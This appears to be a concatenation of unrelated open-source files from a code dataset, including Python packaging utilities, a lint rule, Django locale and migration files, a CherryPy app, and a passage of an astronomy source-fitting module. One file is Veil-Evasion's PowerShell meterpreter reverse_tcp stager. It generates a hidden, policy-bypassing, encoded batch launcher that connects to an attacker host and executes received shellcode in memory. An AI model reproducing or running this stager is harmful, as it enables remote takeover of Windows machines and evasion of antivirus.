        # BUG FIX: previously fell off the end and returned None for bytes
        # input on Python 3 (the Python 2 branch above returns s).
        return s
class HashingFile(object):
    """A write-only file wrapper that hashes and counts everything written."""

    def __init__(self, fd, hashtype='sha256'):
        self.fd = fd
        self.hashtype = hashtype
        self.hash = hashlib.new(hashtype)
        self.length = 0

    def write(self, data):
        # Update the digest and byte count before forwarding the write.
        self.hash.update(data)
        self.length += len(data)
        self.fd.write(data)

    def close(self):
        self.fd.close()

    def digest(self):
        # Historical special case: md5 is reported as plain hex.
        if self.hashtype == 'md5':
            return self.hash.hexdigest()
        raw = self.hash.digest()
        return self.hashtype + '=' + native(urlsafe_b64encode(raw))
class OrderedDefaultDict(OrderedDict):
    """An OrderedDict with defaultdict-style ``default_factory`` support."""

    def __init__(self, *args, **kwargs):
        if args:
            factory = args[0]
            if factory is not None and not callable(factory):
                raise TypeError('first argument must be callable or None')
            self.default_factory = factory
            args = args[1:]
        else:
            self.default_factory = None
        super(OrderedDefaultDict, self).__init__(*args, **kwargs)

    def __missing__(self, key):
        # Mirror defaultdict: build, store, and return the default value.
        if self.default_factory is None:
            raise KeyError(key)
        value = self.default_factory()
        self[key] = value
        return value
if sys.platform == 'win32':
    import ctypes.wintypes
    # CSIDL_APPDATA for reference - not used here for compatibility with
    # dirspec, which uses LOCAL_APPDATA and COMMON_APPDATA in that order
    csidl = dict(CSIDL_APPDATA=26, CSIDL_LOCAL_APPDATA=28,
        CSIDL_COMMON_APPDATA=35)
    def get_path(name):
        # Resolve a CSIDL folder id to its filesystem path via shell32.
        SHGFP_TYPE_CURRENT = 0
        buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
        ctypes.windll.shell32.SHGetFolderPathW(0, csidl[name], 0, SHGFP_TYPE_CURRENT, buf)
        return buf.value
    def save_config_path(*resource):
        # Create (if needed) and return the per-user config directory.
        appdata = get_path("CSIDL_LOCAL_APPDATA")
        path = os.path.join(appdata, *resource)
        if not os.path.isdir(path):
            os.makedirs(path)
        return path
    def load_config_paths(*resource):
        # Yield existing config directories, user-local before machine-wide.
        ids = ["CSIDL_LOCAL_APPDATA", "CSIDL_COMMON_APPDATA"]
        for id in ids:
            base = get_path(id)
            path = os.path.join(base, *resource)
            if os.path.exists(path):
                yield path
else:
    # Non-Windows: defer to the XDG base-directory spec via pyxdg
    # (imported lazily so the dependency is only needed when called).
    def save_config_path(*resource):
        import xdg.BaseDirectory
        return xdg.BaseDirectory.save_config_path(*resource)
    def load_config_paths(*resource):
        import xdg.BaseDirectory
        return xdg.BaseDirectory.load_config_paths(*resource)
def matches_requirement(req, wheels):
    """List of wheels matching a requirement.
    :param req: The requirement to satisfy
    :param wheels: List of wheels to search.
    """
    try:
        from pkg_resources import Distribution, Requirement
    except ImportError:
        raise RuntimeError("Cannot use requirements without pkg_resources")
    req = Requirement.parse(req)
    selected = []
    for wf in wheels:
        f = wf.parsed_filename
        # Build a minimal Distribution from the wheel filename so that
        # pkg_resources can perform the version containment check below.
        dist = Distribution(project_name=f.group("name"), version=f.group("ver"))
        if dist in req:
            selected.append(wf)
    return selected
| gpl-3.0 |
jorik041/Veil-Evasion | modules/payloads/powershell/meterpreter/rev_tcp.py | 4 | 2835 | """
Custom-written pure powershell meterpreter/reverse_tcp stager.
Module @harmj0y
"""
from modules.common import helpers
class Payload:
    """Pure-PowerShell windows/meterpreter/reverse_tcp stager (no shellcode)."""

    def __init__(self):
        # required options
        self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
        self.rating = "Excellent"
        self.language = "powershell"
        self.extension = "bat"

        # optional
        self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
                                  "LPORT" : ["4444", "Port of the metasploit handler"]}

    def generate(self):
        """Return the .bat launcher embedding the deflated PowerShell stager.

        BUG FIX: removed the stray debug ``print baseString`` that dumped the
        raw stager to stdout on every generation (and was Python-2-only
        print-statement syntax).
        """
        baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])

        encoded = helpers.deflate(baseString)

        # Dispatch to the right powershell.exe for the host architecture.
        payloadCode = "@echo off\n"
        payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
        payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
        payloadCode += ") else ("
        payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)

        return payloadCode
| gpl-3.0 |
liuwenf/moose | framework/contrib/nsiqcppstyle/rules/RULE_3_2_B_do_not_use_same_filename_more_than_once.py | 43 | 1934 | """
Do not use same filenames more than once.
== Vilolation ==
/testdir/test1.c
/testdir1/test1.c <== Violation. The filename 'test1' is used two times.
== Good ==
testdir/test.c
testdir1/test1.c
"""
from nsiqcppstyle_reporter import * #@UnusedWildImport
from nsiqcppstyle_rulemanager import * #@UnusedWildImport
import string
filenameMap = {}
def RunRule(lexer, filename, dirname) :
    """Report a violation when the same filename appears in more than one place.

    The first occurrence is only recorded; every later occurrence reports the
    full list of locations seen so far.
    """
    # Visual Studio's stdafx.* precompiled-header files legitimately repeat.
    if filename.startswith("stdafx.") :
        return
    # setdefault replaces the previous "== None" double-branch bookkeeping.
    occurrences = filenameMap.setdefault(filename, [])
    occurrences.append(os.path.join(dirname, filename))
    if len(occurrences) > 1 :
        # ', '.join is the portable idiom for the py2-only string.join().
        nsiqcppstyle_reporter.Error(DummyToken(lexer.filename, "", 0, 0), __name__,
                'Do not use same filename(%s) more than once. This filename is used in %s' % (filename, ", ".join(occurrences)))
ruleManager.AddFileStartRule(RunRule)
###########################################################################################
# Unit Test
###########################################################################################
from nsiqunittest.nsiqcppstyle_unittestbase import *
class testRule(nct):
    # Unit tests for the duplicate-filename rule.
    def setUpRule(self):
        ruleManager.AddFileStartRule(RunRule)
        # Reset the module-level cache so tests do not leak state into each other.
        global filenameMap
        filenameMap = {}
    def test1(self):
        # Same basename in two directories -> violation.
        self.Analyze("test/thisfile.c", "")
        self.Analyze("test2/thisfile.c", "")
        assert CheckErrorContent(__name__)
    def test2(self):
        # Same stem but different extensions -> no violation.
        self.Analyze("test/thisfile.c", "")
        self.Analyze("test/thisfile.h", "")
        assert not CheckErrorContent(__name__)
    def test3(self):
        # stdafx.* files are exempt even when repeated.
        self.Analyze("test/stdafx.h", "")
        self.Analyze("test/stdafx.h", "")
        self.Analyze("test/thisfile.c", "")
        self.Analyze("test/thisfile.h", "")
        assert not CheckErrorContent(__name__)
| lgpl-2.1 |
seungjin/app5-seungjin-net.appspot.com | django/conf/locale/ml/formats.py | 341 | 1635 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
# NOTE(review): although this is the Malayalam ('ml') locale file, every value
# below mirrors the Django en-US defaults — presumably an unlocalized copied
# template; confirm against the locale before relying on these.
DATE_FORMAT = 'N j, Y'
TIME_FORMAT = 'P'
DATETIME_FORMAT = 'N j, Y, P'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'F j'
SHORT_DATE_FORMAT = 'm/d/Y'
SHORT_DATETIME_FORMAT = 'm/d/Y P'
FIRST_DAY_OF_WEEK = 0 # Sunday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
    '%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
    # '%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
    # '%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
    # '%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
    # '%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
)
TIME_INPUT_FORMATS = (
    '%H:%M:%S', # '14:30:59'
    '%H:%M', # '14:30'
)
DATETIME_INPUT_FORMATS = (
    '%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
    '%Y-%m-%d %H:%M', # '2006-10-25 14:30'
    '%Y-%m-%d', # '2006-10-25'
    '%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
    '%m/%d/%Y %H:%M', # '10/25/2006 14:30'
    '%m/%d/%Y', # '10/25/2006'
    '%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
    '%m/%d/%y %H:%M', # '10/25/06 14:30'
    '%m/%d/%y', # '10/25/06'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
MakeHer/edx-platform | common/djangoapps/microsite_configuration/migrations/0001_initial.py | 41 | 5458 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import jsonfield.fields
import django.db.models.deletion
from django.conf import settings
import model_utils.fields
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated initial schema for microsite configuration, including the
    # django-simple-history style Historical* shadow tables.
    dependencies = [
        ('sites', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='HistoricalMicrositeOrganizationMapping',
            fields=[
                ('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
                ('organization', models.CharField(max_length=63, db_index=True)),
                ('history_id', models.AutoField(serialize=False, primary_key=True)),
                ('history_date', models.DateTimeField()),
                ('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
                ('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
            ],
            options={
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
                'verbose_name': 'historical microsite organization mapping',
            },
        ),
        migrations.CreateModel(
            name='HistoricalMicrositeTemplate',
            fields=[
                ('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
                ('template_uri', models.CharField(max_length=255, db_index=True)),
                ('template', models.TextField()),
                ('history_id', models.AutoField(serialize=False, primary_key=True)),
                ('history_date', models.DateTimeField()),
                ('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
                ('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
            ],
            options={
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
                'verbose_name': 'historical microsite template',
            },
        ),
        migrations.CreateModel(
            name='Microsite',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('key', models.CharField(unique=True, max_length=63, db_index=True)),
                ('values', jsonfield.fields.JSONField(blank=True)),
                ('site', models.OneToOneField(related_name='microsite', to='sites.Site')),
            ],
        ),
        migrations.CreateModel(
            name='MicrositeHistory',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('key', models.CharField(unique=True, max_length=63, db_index=True)),
                ('values', jsonfield.fields.JSONField(blank=True)),
                ('site', models.OneToOneField(related_name='microsite_history', to='sites.Site')),
            ],
            options={
                'verbose_name_plural': 'Microsite histories',
            },
        ),
        migrations.CreateModel(
            name='MicrositeOrganizationMapping',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('organization', models.CharField(unique=True, max_length=63, db_index=True)),
                ('microsite', models.ForeignKey(to='microsite_configuration.Microsite')),
            ],
        ),
        migrations.CreateModel(
            name='MicrositeTemplate',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('template_uri', models.CharField(max_length=255, db_index=True)),
                ('template', models.TextField()),
                ('microsite', models.ForeignKey(to='microsite_configuration.Microsite')),
            ],
        ),
        migrations.AddField(
            model_name='historicalmicrositetemplate',
            name='microsite',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='microsite_configuration.Microsite', null=True),
        ),
        migrations.AddField(
            model_name='historicalmicrositeorganizationmapping',
            name='microsite',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='microsite_configuration.Microsite', null=True),
        ),
        migrations.AlterUniqueTogether(
            name='micrositetemplate',
            unique_together=set([('microsite', 'template_uri')]),
        ),
    ]
| agpl-3.0 |
ll011234ll/--2014cp_project_40323247 | helloworld.py | 73 | 3294 | # coding=utf-8
# 上面的程式內容編碼必須在程式的第一或者第二行才會有作用
################# (1) 模組導入區
# 導入 cherrypy 模組, 為了在 OpenShift 平台上使用 cherrypy 模組, 必須透過 setup.py 安裝
import cherrypy
# 導入 Python 內建的 os 模組, 因為 os 模組為 Python 內建, 所以無需透過 setup.py 安裝
import os
################# (2) Global variable setup
# Directory containing this program file (on Windows the joined path keeps a
# trailing backslash).
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# Pick the data storage directory depending on cloud vs. local execution.
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
    # Running on the OpenShift cloud platform.
    download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
    data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
    # Running locally.
    download_root_dir = _curdir + "/local_data/"
    data_dir = _curdir + "/local_data/"
'''以下為近端 input() 與 for 迴圈應用的程式碼, 若要將程式送到 OpenShift 執行, 除了採用 CherryPy 網際框架外, 還要轉為 html 列印
# 利用 input() 取得的資料型別為字串
toprint = input("要印甚麼內容?")
# 若要將 input() 取得的字串轉為整數使用, 必須利用 int() 轉換
repeat_no = int(input("重複列印幾次?"))
for i in range(repeat_no):
print(toprint)
'''
################# (3) Class definition section
# From here on the program uses the CherryPy web-framework structure.
# Hello inherits from object, gaining its default methods and attributes.
class Hello(object):
    # Startup configuration for the Hello class.
    _cp_config = {
        'tools.encode.encoding': 'utf-8',
        'tools.sessions.on' : True,
        'tools.sessions.storage_type' : 'file',
        'tools.sessions.locking' : 'explicit',
        # Sessions are stored as files, under the tmp directory inside data_dir.
        'tools.sessions.storage_path' : data_dir+'/tmp',
        # Session lifetime is set to 60 minutes.
        'tools.sessions.timeout' : 60
    }
    # The @cherrypy.expose decorator marks the following member method as
    # directly reachable by users through a URL.
    @cherrypy.expose
    # index is CherryPy's default method for each class: when the user's URL
    # names no method, the framework runs index first.
    # Methods taking 'self' are instance methods; Python passes object state
    # between member methods through this 'self' reference.
    def index(self, toprint="Hello World!"):
        return toprint
################# (4) Program startup section
# Configure static directories/files relative to the program directory.
application_conf = {'/static':{
        'tools.staticdir.on': True,
        # A 'static' directory must be created manually under the program
        # directory.
        'tools.staticdir.dir': _curdir+"/static"},
    '/downloads':{
        'tools.staticdir.on': True,
        'tools.staticdir.dir': data_dir+"/downloads"},
    '/images':{
        'tools.staticdir.on': True,
        'tools.staticdir.dir': data_dir+"/images"}
}
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
    # Running on OpenShift: hand the WSGI application object to the platform.
    application = cherrypy.Application(Hello(), config=application_conf)
else:
    # Running locally: start CherryPy's built-in server.
    cherrypy.quickstart(Hello(), config=application_conf)
| gpl-3.0 |
legacysurvey/pipeline | py/legacypipe/oneblob.py | 1 | 92323 | from __future__ import print_function
import numpy as np
import time
from astrometry.util.ttime import Time
from astrometry.util.resample import resample_with_wcs, OverlapError
from astrometry.util.fits import fits_table
from astrometry.util.plotutils import dimshow
from tractor import Tractor, PointSource, Image, Catalog, Patch
from tractor.galaxy import (DevGalaxy, ExpGalaxy,
disable_galaxy_cache, enable_galaxy_cache)
from tractor.patch import ModelMask
from tractor.sersic import SersicGalaxy
from legacypipe.survey import (RexGalaxy, GaiaSource,
LegacyEllipseWithPriors, LegacySersicIndex, get_rgb)
from legacypipe.bits import IN_BLOB
from legacypipe.coadds import quick_coadds
from legacypipe.runbrick_plots import _plot_mods
rgbkwargs_resid = dict(resids=True)
import logging
logger = logging.getLogger('legacypipe.oneblob')
def info(*args):
    """Forward *args* to the module logger at INFO level."""
    from legacypipe.utils import log_info as _log_info
    _log_info(logger, args)
def debug(*args):
    """Forward *args* to the module logger at DEBUG level."""
    from legacypipe.utils import log_debug as _log_debug
    _log_debug(logger, args)
# singleton: cached result of get_cpu_arch(), so /proc/cpuinfo is read at
# most once per process.
cpu_arch = None
def get_cpu_arch():
    """Return a short code name for the host CPU architecture.

    Parses /proc/cpuinfo (Linux only) for the first 'cpu family' and
    'model' entries and maps known NERSC Cori architectures to their
    code names.  The result is cached in the module-level ``cpu_arch``
    singleton.

    Returns:
        str: 'has' (Haswell), 'knl' (Knights Landing), or '' when the
        CPU is unrecognized or /proc/cpuinfo is unavailable.
    """
    global cpu_arch
    import os
    if cpu_arch is not None:
        return cpu_arch
    family = None
    model = None
    if os.path.exists('/proc/cpuinfo'):
        # Use a context manager so the file handle is closed promptly
        # (the original open(...).readlines() leaked the handle).
        with open('/proc/cpuinfo') as f:
            for line in f:
                # Split on the first ':' only, so values that themselves
                # contain colons (e.g. some 'model name' strings) do not
                # get truncated.
                key, _, value = line.partition(':')
                key = key.strip()
                value = value.strip()
                if not value:
                    continue
                if key == 'cpu family' and family is None:
                    family = int(value)
                elif key == 'model' and model is None:
                    model = int(value)
    codenames = {
        # NERSC Cori machines
        (6, 63): 'has',
        (6, 87): 'knl',
    }
    cpu_arch = codenames.get((family, model), '')
    return cpu_arch
def one_blob(X):
    '''
    Fits sources contained within a "blob" of pixels.

    X is a single argument tuple (or None), packed this way so the function
    can be mapped over a multiprocessing pool; it is unpacked below.

    Returns a fits_table with one row per source (including any iteratively
    detected sources merged in by OneBlob.run), or None when there is
    nothing to fit (X is None or no images overlap the blob).
    '''
    if X is None:
        return None
    (nblob, iblob, Isrcs, brickwcs, bx0, by0, blobw, blobh, blobmask, timargs,
     srcs, bands, plots, ps, reoptimize, iterative, use_ceres, refmap,
     large_galaxies_force_pointsource, less_masking) = X
    debug('Fitting blob number %i: blobid %i, nsources %i, size %i x %i, %i images' %
          (nblob, iblob, len(Isrcs), blobw, blobh, len(timargs)))
    if len(timargs) == 0:
        return None
    LegacySersicIndex.stepsize = 0.001
    if plots:
        import pylab as plt
        plt.figure(2, figsize=(3,3))
        plt.subplots_adjust(left=0.01, right=0.99, bottom=0.01, top=0.99)
        plt.figure(1)
    t0 = time.process_time()
    # A local WCS for this blob
    blobwcs = brickwcs.get_subimage(bx0, by0, blobw, blobh)
    # Per-source measurements for this blob
    B = fits_table()
    B.sources = srcs
    B.Isrcs = Isrcs
    B.iblob = iblob
    B.blob_x0 = np.zeros(len(B), np.int16) + bx0
    B.blob_y0 = np.zeros(len(B), np.int16) + by0
    # Did sources start within the blob?
    ok,x0,y0 = blobwcs.radec2pixelxy(
        np.array([src.getPosition().ra for src in srcs]),
        np.array([src.getPosition().dec for src in srcs]))
    # Convert 1-indexed pixel coords to 0-indexed and clip into blob bounds.
    safe_x0 = np.clip(np.round(x0-1).astype(int), 0,blobw-1)
    safe_y0 = np.clip(np.round(y0-1).astype(int), 0,blobh-1)
    B.init_x = safe_x0
    B.init_y = safe_y0
    B.started_in_blob = blobmask[safe_y0, safe_x0]
    # This uses 'initial' pixel positions, because that's what determines
    # the fitting behaviors.
    B.brightblob = refmap[safe_y0, safe_x0].astype(np.int16)
    B.cpu_source = np.zeros(len(B), np.float32)
    B.blob_width = np.zeros(len(B), np.int16) + blobw
    B.blob_height = np.zeros(len(B), np.int16) + blobh
    B.blob_npix = np.zeros(len(B), np.int32) + np.sum(blobmask)
    B.blob_nimages= np.zeros(len(B), np.int16) + len(timargs)
    # Placeholders, filled in during model selection (symmetrized-blob stats).
    B.blob_symm_width = np.zeros(len(B), np.int16)
    B.blob_symm_height = np.zeros(len(B), np.int16)
    B.blob_symm_npix = np.zeros(len(B), np.int32)
    B.blob_symm_nimages = np.zeros(len(B), np.int16)
    B.hit_limit = np.zeros(len(B), bool)
    ob = OneBlob('%i'%(nblob+1), blobwcs, blobmask, timargs, srcs, bands,
                 plots, ps, use_ceres, refmap,
                 large_galaxies_force_pointsource,
                 less_masking)
    B = ob.run(B, reoptimize=reoptimize, iterative_detection=iterative)
    B.blob_totalpix = np.zeros(len(B), np.int32) + ob.total_pix
    # Record whether each source's *final* fit position is inside the blob.
    ok,x1,y1 = blobwcs.radec2pixelxy(
        np.array([src.getPosition().ra for src in B.sources]),
        np.array([src.getPosition().dec for src in B.sources]))
    B.finished_in_blob = blobmask[
        np.clip(np.round(y1-1).astype(int), 0, blobh-1),
        np.clip(np.round(x1-1).astype(int), 0, blobw-1)]
    assert(len(B.finished_in_blob) == len(B))
    assert(len(B.finished_in_blob) == len(B.started_in_blob))
    # Setting values here (after .run() has completed) means that iterative sources
    # (which get merged with the original table B) get values also.
    B.cpu_arch = np.zeros(len(B), dtype='U3')
    B.cpu_arch[:] = get_cpu_arch()
    B.cpu_blob = np.empty(len(B), np.float32)
    t1 = time.process_time()
    B.cpu_blob[:] = t1 - t0
    B.blob = np.empty(len(B), np.int32)
    B.blob[:] = iblob
    return B
class OneBlob(object):
    def __init__(self, name, blobwcs, blobmask, timargs, srcs, bands,
                 plots, ps, use_ceres, refmap,
                 large_galaxies_force_pointsource,
                 less_masking):
        """Set up per-blob state: WCS, mask, images (tims), sources, bands,
        plotting flags, and the optimizer configuration used by all fits.
        """
        self.name = name
        self.blobwcs = blobwcs
        self.pixscale = self.blobwcs.pixel_scale()
        self.blobmask = blobmask
        self.srcs = srcs
        self.bands = bands
        self.plots = plots
        self.refmap = refmap
        #self.plots_per_source = False
        self.plots_per_source = plots
        self.plots_per_model = False
        # blob-1-data.png, etc
        self.plots_single = False
        self.ps = ps
        self.use_ceres = use_ceres
        self.deblend = False
        self.large_galaxies_force_pointsource = large_galaxies_force_pointsource
        self.less_masking = less_masking
        # Build tractor Image objects from the packed per-image arguments.
        self.tims = self.create_tims(timargs)
        # Total number of usable (inverse-error > 0) pixels across all images.
        self.total_pix = sum([np.sum(t.getInvError() > 0) for t in self.tims])
        self.plots2 = False
        alphas = [0.1, 0.3, 1.0]
        self.optargs = dict(priors=True, shared_params=False, alphas=alphas,
                            print_progress=True)
        self.blobh,self.blobw = blobmask.shape
        # "Big" blobs (>100x100 pix) get sub-image treatment during fitting.
        self.bigblob = (self.blobw * self.blobh) > 100*100
        if self.bigblob:
            debug('Big blob:', name)
        self.trargs = dict()
        # if use_ceres:
        #     from tractor.ceres_optimizer import CeresOptimizer
        #     ceres_optimizer = CeresOptimizer()
        #     self.optargs.update(scale_columns=False,
        #                         scaled=False,
        #                         dynamic_scale=False)
        #     self.trargs.update(optimizer=ceres_optimizer)
        # else:
        #     self.optargs.update(dchisq = 0.1)
        #from tractor.constrained_optimizer import ConstrainedOptimizer
        #self.trargs.update(optimizer=ConstrainedOptimizer())
        from tractor.dense_optimizer import ConstrainedDenseOptimizer
        self.trargs.update(optimizer=ConstrainedDenseOptimizer())
        self.optargs.update(dchisq = 0.1)
    def run(self, B, reoptimize=False, iterative_detection=True,
            compute_metrics=True):
        """Run the full per-blob fitting pipeline.

        Stages: optional flux-only warm start, per-source optimization (in
        decreasing brightness order), optional simultaneous optimization for
        small blobs, segmentation-map computation, model selection (which may
        append iteratively-detected sources), an optional re-optimization
        pass, and finally per-source inverse-variances and metrics.

        Returns the measurement table B, cut to surviving sources and
        possibly extended with iterative detections.
        """
        trun = tlast = Time()
        # Not quite so many plots...
        self.plots1 = self.plots
        cat = Catalog(*self.srcs)
        if self.plots:
            import pylab as plt
            self._initial_plots()
            from legacypipe.detection import plot_boundary_map
            plt.clf()
            dimshow(self.rgb)
            ax = plt.axis()
            bitset = ((self.refmap & IN_BLOB['MEDIUM']) != 0)
            plot_boundary_map(bitset, rgb=(255,0,0), iterations=2)
            bitset = ((self.refmap & IN_BLOB['BRIGHT']) != 0)
            plot_boundary_map(bitset, rgb=(200,200,0), iterations=2)
            bitset = ((self.refmap & IN_BLOB['GALAXY']) != 0)
            plot_boundary_map(bitset, rgb=(0,255,0), iterations=2)
            plt.axis(ax)
            plt.title('Reference-source Masks')
            self.ps.savefig()
        if not self.bigblob:
            debug('Fitting just fluxes using initial models...')
            self._fit_fluxes(cat, self.tims, self.bands)
        tr = self.tractor(self.tims, cat)
        if self.plots:
            self._plots(tr, 'Initial models')
        # Optimize individual sources, in order of flux.
        # First, choose the ordering...
        Ibright = _argsort_by_brightness(cat, self.bands, ref_first=True)
        # The sizes of the model patches fit here are determined by the
        # sources themselves, ie by the size of the mod patch returned by
        # src.getModelPatch(tim)
        if len(cat) > 1:
            self._optimize_individual_sources_subtract(
                cat, Ibright, B.cpu_source)
        else:
            self._optimize_individual_sources(tr, cat, Ibright, B.cpu_source)
        # Optimize all at once?
        if len(cat) > 1 and len(cat) <= 10:
            cat.thawAllParams()
            # Sources flagged 'freezeparams' (e.g. fixed reference sources)
            # are kept fixed during the simultaneous fit.
            for i,src in enumerate(cat):
                if getattr(src, 'freezeparams', False):
                    debug('Frozen source', src, '-- keeping as-is!')
                    cat.freezeParam(i)
            tr.optimize_loop(**self.optargs)
        if self.plots:
            self._plots(tr, 'After source fitting')
            plt.clf()
            self._plot_coadd(self.tims, self.blobwcs, model=tr)
            plt.title('After source fitting')
            self.ps.savefig()
        if self.plots_single:
            plt.figure(2)
            mods = list(tr.getModelImages())
            coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs, images=mods,
                                    fill_holes=False)
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            plt.savefig('blob-%s-initmodel.png' % (self.name))
            res = [(tim.getImage() - mod) for tim,mod in zip(self.tims, mods)]
            coresids,_ = quick_coadds(self.tims, self.bands, self.blobwcs, images=res)
            dimshow(get_rgb(coresids, self.bands, resids=True), ticks=False)
            plt.savefig('blob-%s-initresid.png' % (self.name))
            dimshow(get_rgb(coresids, self.bands), ticks=False)
            plt.savefig('blob-%s-initsub.png' % (self.name))
            plt.figure(1)
        debug('Blob', self.name, 'finished initial fitting:', Time()-tlast)
        tlast = Time()
        self.compute_segmentation_map()
        # Next, model selections: point source vs dev/exp vs composite.
        B = self.run_model_selection(cat, Ibright, B,
                                     iterative_detection=iterative_detection)
        debug('Blob', self.name, 'finished model selection:', Time()-tlast)
        tlast = Time()
        # Cut down to just the kept sources
        cat = B.sources
        I = np.array([i for i,s in enumerate(cat) if s is not None])
        B.cut(I)
        cat = Catalog(*B.sources)
        tr.catalog = cat
        if self.plots:
            self._plots(tr, 'After model selection')
        if self.plots_single:
            plt.figure(2)
            mods = list(tr.getModelImages())
            coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs, images=mods,
                                       fill_holes=False)
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            plt.savefig('blob-%s-model.png' % (self.name))
            res = [(tim.getImage() - mod) for tim,mod in zip(self.tims, mods)]
            coresids,nil = quick_coadds(self.tims, self.bands, self.blobwcs, images=res)
            dimshow(get_rgb(coresids, self.bands, resids=True), ticks=False)
            plt.savefig('blob-%s-resid.png' % (self.name))
            plt.figure(1)
        # Do another quick round of flux-only fitting?
        # This does horribly -- fluffy galaxies go out of control because
        # they're only constrained by pixels within this blob.
        #_fit_fluxes(cat, tims, bands, use_ceres, alphas)
        # A final optimization round?
        if reoptimize:
            if self.plots:
                import pylab as plt
                modimgs = list(tr.getModelImages())
                co,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
                                    images=modimgs)
                plt.clf()
                dimshow(get_rgb(co, self.bands))
                plt.title('Before final opt')
                self.ps.savefig()
            # Re-sort by brightness: model selection may have changed fluxes.
